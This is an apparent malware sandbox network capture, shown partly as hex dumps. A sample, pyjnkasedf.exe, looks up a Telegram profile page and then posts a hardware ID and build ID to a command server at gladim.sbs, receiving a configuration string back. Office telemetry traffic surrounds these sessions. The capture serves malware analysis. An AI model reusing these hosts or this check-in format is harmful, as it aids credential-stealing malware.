                                                                                                                                                                                                                                                      • api.edgeoffer.microsoft.com
                                                                                                                                                                                                                                                      • login.live.com
                                                                                                                                                                                                                                                      • chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                      • clients2.googleusercontent.com
                                                                                                                                                                                                                                                      • https:
                                                                                                                                                                                                                                                        • assets2.msn.com
                                                                                                                                                                                                                                                        • sb.scorecardresearch.com
                                                                                                                                                                                                                                                        • arc.msn.com
                                                                                                                                                                                                                                                        • browser.events.data.msn.com
                                                                                                                                                                                                                                                        • img-s-msn-com.akamaized.net
                                                                                                                                                                                                                                                        • c.msn.com
                                                                                                                                                                                                                                                      • data-edge.smartscreen.microsoft.com
                                                                                                                                                                                                                                                      • msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com
                                                                                                                                                                                                                                                      • edgeassetservice.azureedge.net
                                                                                                                                                                                                                                                      • deff.nelreports.net
                                                                                                                                                                                                                                                      • bzib.nelreports.net
                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                      0192.168.2.1049704149.154.167.994437496C:\Users\user\Desktop\pyjnkasedf.exe
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-11-30 21:38:04 UTC85OUTGET /gv4dlp HTTP/1.1
                                                                                                                                                                                                                                                      Host: t.me
                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                      2024-11-30 21:38:05 UTC509INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Server: nginx/1.18.0
                                                                                                                                                                                                                                                      Date: Sat, 30 Nov 2024 21:38:04 GMT
                                                                                                                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                      Content-Length: 12293
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      Set-Cookie: stel_ssid=9478f05ffc95c2c19c_90402219876115135; expires=Sun, 01 Dec 2024 21:38:04 GMT; path=/; samesite=None; secure; HttpOnly
                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                      Cache-control: no-store
                                                                                                                                                                                                                                                      X-Frame-Options: ALLOW-FROM https://web.telegram.org
                                                                                                                                                                                                                                                      Content-Security-Policy: frame-ancestors https://web.telegram.org
                                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=35768000
                                                                                                                                                                                                                                                      2024-11-30 21:38:05 UTC12293INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 65 6c 65 67 72 61 6d 3a 20 43 6f 6e 74 61 63 74 20 40 67 76 34 64 6c 70 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 74 72 79 7b 69 66 28 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 21 3d 6e 75 6c 6c 26 26 77 69 6e 64 6f 77 21 3d 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 29 7b 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74
                                                                                                                                                                                                                                                      Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @gv4dlp</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window.parent


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                      1192.168.2.104970594.130.210.714437496C:\Users\user\Desktop\pyjnkasedf.exe
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-11-30 21:38:07 UTC225OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
                                                                                                                                                                                                                                                      Host: gladim.sbs
                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                      2024-11-30 21:38:08 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                      Date: Sat, 30 Nov 2024 21:38:07 GMT
                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      2024-11-30 21:38:08 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                      2192.168.2.104970613.107.246.63443
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-11-30 21:38:07 UTC195OUTGET /rules/other-Win32-v19.bundle HTTP/1.1
                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                      2024-11-30 21:38:08 UTC471INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Date: Sat, 30 Nov 2024 21:38:08 GMT
                                                                                                                                                                                                                                                      Content-Type: text/plain
                                                                                                                                                                                                                                                      Content-Length: 218853
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                      Cache-Control: public
                                                                                                                                                                                                                                                      Last-Modified: Wed, 27 Nov 2024 15:11:14 GMT
                                                                                                                                                                                                                                                      ETag: "0x8DD0EF5BC53602D"
                                                                                                                                                                                                                                                      x-ms-request-id: a5a19dc6-401e-008c-1dff-4086c2000000
                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                      x-azure-ref: 20241130T213808Z-174f7845968vqt9xhC1EWRgten000000124g000000001vrn
                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                      2024-11-30 21:38:08 UTC15913INData Raw: 31 30 30 30 76 35 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 30 22 20 56 3d 22 35 22 20 44 43 3d 22 45 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 52 75 6c 65 45 72 72 6f 72 73 41 67 67 72 65 67 61 74 65 64 22 20 41 54 54 3d 22 66 39 39 38 63 63 35 62 61 34 64 34 34 38 64 36 61 31 65 38 65 39 31 33 66 66 31 38 62 65 39 34 2d 64 64 31 32 32 65 30 61 2d 66 63 66 38 2d 34 64 63 35 2d 39 64 62 62 2d 36 61 66 61 63 35 33 32 35 31 38 33 2d 37 34 30 35 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 53 3d 22 37 30 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 20 50 53 55 22 20
                                                                                                                                                                                                                                                      Data Ascii: 1000v5+<?xml version="1.0" encoding="utf-8"?><R Id="1000" V="5" DC="ESM" EN="Office.Telemetry.RuleErrorsAggregated" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" SP="CriticalBusinessImpact" S="70" DL="A" DCa="PSP PSU"
                                                                                                                                                                                                                                                      2024-11-30 21:38:08 UTC16384INData Raw: 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 42 22 20 49 3d 22 35 22 20 4f 3d 22 66 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20
                                                                                                                                                                                                                                                      Data Ascii: /> </R> </O> </R> </O> </C> <C T="B" I="5" O="false"> <O T="AND"> <L> <O T="GE"> <L> <S T="1" F="0" /> </L> <R> <V V="400" T="I32" />
                                                                                                                                                                                                                                                      2024-11-30 21:38:08 UTC16384INData Raw: 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 38 32 30 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 43 6f 6e 74 61 63 74 43 61 72 64 50 72 6f 70 65 72 74 69 65 73 43 6f 75 6e 74 73 22 20 41 54 54 3d 22 64 38 30 37 36 30 39 32 37 36 37 34 34 32 34 35 62 61 66 38 31 62 66 37 62 63 38 30 33 33 66 36 2d 32 32 36 38 65 33 37 34 2d 37 37 36 36 2d 34 39 37 36 2d 62 65 34 34 2d 62 36 61 64 35 62 64 64 63 35 62 36 2d 37 38 31 33 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 68 75 74 64 6f 77 6e 22 20 2f 3e 0d
                                                                                                                                                                                                                                                      Data Ascii: .0" encoding="utf-8"?><R Id="10820" V="3" DC="SM" EN="Office.Outlook.Desktop.ContactCardPropertiesCounts" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-7813" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryShutdown" />
                                                                                                                                                                                                                                                      2024-11-30 21:38:08 UTC16384INData Raw: 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 39 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 41 67 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 34 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 30 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 31 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 46 69 6c 65 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 38 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20
                                                                                                                                                                                                                                                      Data Ascii: </C> <C T="U32" I="9" O="true" N="Purged_Age"> <S T="4" F="Count" /> </C> <C T="U32" I="10" O="true" N="Purged_Count"> <S T="5" F="Count" /> </C> <C T="U32" I="11" O="true" N="File_Count"> <S T="8" F="Count" /> </C>
                                                                                                                                                                                                                                                      2024-11-30 21:38:08 UTC16384INData Raw: 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 43 61 72 64 5f 56 61 6c 69 64 4d 61 6e 61 67 65 72 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 52 65 73 75 6c 74 5f 56 61 6c 69 64 50 65 72 73 6f 6e 61 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 32 22 20 2f 3e 0d 0a 20
                                                                                                                                                                                                                                                      Data Ascii: <S T="10" /> </C> </C> <C T="U32" I="1" O="false" N="Count_CreateCard_ValidManager_False"> <C> <S T="11" /> </C> </C> <C T="U32" I="2" O="false" N="Count_CreateResult_ValidPersona_False"> <C> <S T="12" />
                                                                                                                                                                                                                                                      2024-11-30 21:38:08 UTC16384INData Raw: 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 57 61 73 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6c 65 61 6e 75 70 4d 73 6f 50 65 72 73 6f 6e 61 5f 49 4d 73 6f 50 65 72 73 6f 6e
                                                                                                                                                                                                                                                      Data Ascii: Paint_IMsoPersona_WasNull_Count"> <C> <S T="32" /> </C> </C> <C T="U32" I="20" O="false" N="Paint_IMsoPersona_Null_Count"> <C> <S T="33" /> </C> </C> <C T="U32" I="21" O="false" N="CleanupMsoPersona_IMsoPerson
                                                                                                                                                                                                                                                      2024-11-30 21:38:08 UTC16384INData Raw: 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 32 30 30 22 20 54 3d 22 49 36 34 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 52 65 74 72 69 65 76 61 6c 4d 69 6c 6c 69 73 65 63 6f 6e 64 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22
                                                                                                                                                                                                                                                      Data Ascii: <R> <V V="200" T="I64" /> </R> </O> </L> <R> <O T="LT"> <L> <S T="3" F="RetrievalMilliseconds" /> </L> <R> <V V="400"
                                                                                                                                                                                                                                                      2024-11-30 21:38:08 UTC16384INData Raw: 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 53 75 63 63 65 73 73 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 46 61 69 6c 65 64 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43
                                                                                                                                                                                                                                                      Data Ascii: </S> <C T="U32" I="0" O="false" N="Ocom2IUCOfficeIntegrationFirstCallSuccessCount"> <C> <S T="9" /> </C> </C> <C T="U32" I="1" O="false" N="Ocom2IUCOfficeIntegrationFirstCallFailedCount"> <C> <S T="10" /> </C
                                                                                                                                                                                                                                                      2024-11-30 21:38:08 UTC16384INData Raw: 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 54 65 6e 61 6e 74 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 55 73 65 72 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 66 61 6c 73 65 22 20 54 3d 22 42 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                                                      Data Ascii: L> <S T="3" F="Tenant enabled" /> </L> <R> <O T="EQ"> <L> <S T="3" F="User enabled" /> </L> <R> <V V="false" T="B" /> </R>
                                                                                                                                                                                                                                                      2024-11-30 21:38:08 UTC16384INData Raw: 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 34 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 37 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 48 74 74 70 53 74 61 74 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20
                                                                                                                                                                                                                                                      Data Ascii: us" /> </L> <R> <V V="404" T="U32" /> </R> </O> </F> <F T="7"> <O T="AND"> <L> <O T="GE"> <L> <S T="2" F="HttpStatus" /> </L>


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                      3192.168.2.104970794.130.210.714437496C:\Users\user\Desktop\pyjnkasedf.exe
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-11-30 21:38:09 UTC317OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----JDHCBAEHJJJKKFIDGHJE
                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
                                                                                                                                                                                                                                                      Host: gladim.sbs
                                                                                                                                                                                                                                                      Content-Length: 256
                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                      2024-11-30 21:38:09 UTC256OUTData Raw: 2d 2d 2d 2d 2d 2d 4a 44 48 43 42 41 45 48 4a 4a 4a 4b 4b 46 49 44 47 48 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 39 35 43 39 38 33 36 37 37 30 31 32 32 36 33 31 38 30 30 32 35 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 48 43 42 41 45 48 4a 4a 4a 4b 4b 46 49 44 47 48 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 35 65 30 30 61 61 35 30 32 65 37 39 61 35 62 36 63 35 34 62 66 63 36 61 33 32 33 31 61 33 62 35 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 48 43 42 41 45 48 4a 4a 4a 4b 4b 46 49 44 47 48 4a 45 2d 2d 0d
                                                                                                                                                                                                                                                      Data Ascii: ------JDHCBAEHJJJKKFIDGHJEContent-Disposition: form-data; name="hwid"A95C983677012263180025-a33c7340-61ca------JDHCBAEHJJJKKFIDGHJEContent-Disposition: form-data; name="build_id"5e00aa502e79a5b6c54bfc6a3231a3b5------JDHCBAEHJJJKKFIDGHJE--
                                                                                                                                                                                                                                                      2024-11-30 21:38:10 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                      Date: Sat, 30 Nov 2024 21:38:10 GMT
                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      2024-11-30 21:38:10 UTC70INData Raw: 33 62 0d 0a 31 7c 31 7c 31 7c 31 7c 38 35 31 64 61 39 61 65 61 38 30 61 37 38 33 35 61 64 65 33 31 37 64 37 66 65 38 61 63 61 35 35 7c 31 7c 31 7c 31 7c 30 7c 30 7c 31 30 30 30 30 30 7c 31 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                      Data Ascii: 3b1|1|1|1|851da9aea80a7835ade317d7fe8aca55|1|1|1|0|0|100000|10


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                      4192.168.2.104971213.107.246.63443
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-11-30 21:38:10 UTC192OUTGET /rules/rule120609v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                      2024-11-30 21:38:11 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Date: Sat, 30 Nov 2024 21:38:11 GMT
                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                      Content-Length: 408
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                                                                                                                                                      ETag: "0x8DC582BB56D3AFB"
                                                                                                                                                                                                                                                      x-ms-request-id: 44a2812f-d01e-0028-1207-427896000000
                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                      x-azure-ref: 20241130T213811Z-174f7845968ljs8phC1EWRe6en00000011xg0000000032m8
                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                      2024-11-30 21:38:11 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 44 64 5d 5b 45 65 5d 5b 4c 6c 5d 5b 4c 6c 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120609" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120682" /> <SR T="2" R="^([Dd][Ee][Ll][Ll])"> <S T="1" F="0" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                      5192.168.2.104971113.107.246.63443
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-11-30 21:38:10 UTC192OUTGET /rules/rule120600v4s19.xml HTTP/1.1
                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                      2024-11-30 21:38:11 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Date: Sat, 30 Nov 2024 21:38:11 GMT
                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                      Content-Length: 2980
                                                                                                                                                                                                                                                      Connection: close
